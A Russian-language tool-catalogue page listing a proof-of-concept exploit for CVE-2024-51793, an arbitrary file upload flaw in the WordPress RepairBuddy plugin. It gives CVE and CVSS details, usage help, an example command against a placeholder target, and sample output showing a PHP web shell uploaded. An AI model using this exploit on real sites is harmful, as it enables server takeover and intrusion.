Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-51793 — Плагин RepairBuddy для WordPress <= 3.8115 - Уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-51793
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnxploited/cve-2024-51793

CVE-2024-51793

Плагин RepairBuddy для WordPress <= 3.8115 - Уязвимость произвольной загрузки файлов

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ Эксплойт плагина WordPress RepairBuddy

📜 Информация о CVE

CVE-ID: CVE-2024-51793
Опубликован: 2024-11-11
Обновлён: 2024-11-11
Название: Уязвимость произвольной загрузки файлов в плагине WordPress RepairBuddy <= 3.8115
Описание:
Уязвимость неограниченной загрузки файлов опасного типа в Webful Creations Computer Repair Shop позволяет загрузить веб-шелл на веб-сервер. Эта проблема затрагивает Computer Repair Shop: версии с n/a по 3.8115.

CWE:

  • CWE-434: Неограниченная загрузка файлов опасного типа

CVSS:

  • Оценка: 10.0 (КРИТИЧЕСКАЯ)
  • Версия: 3.1
  • Векторная строка: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

📋 Описание

Это доказательство концепции эксплойта для уязвимости произвольной загрузки файлов в плагине WordPress RepairBuddy версий <= 3.8115. Эксплойт позволяет злоумышленнику загрузить веб-шелл на уязвимый сервер.

⚙️ Требования

  • Python 3.x
  • Библиотека requests (pip install requests)

🚀 Использование

root@kitploit:~
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload

📖 Пример

root@kitploit:~
python 
CVE-2024-51793.py -u http://target.com/wordpress

📝 Вывод

root@kitploit:~
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php

👨‍💻 Автор

Эксплойт создан: Nxploited, Khaled Alenazi

Скачать инструмент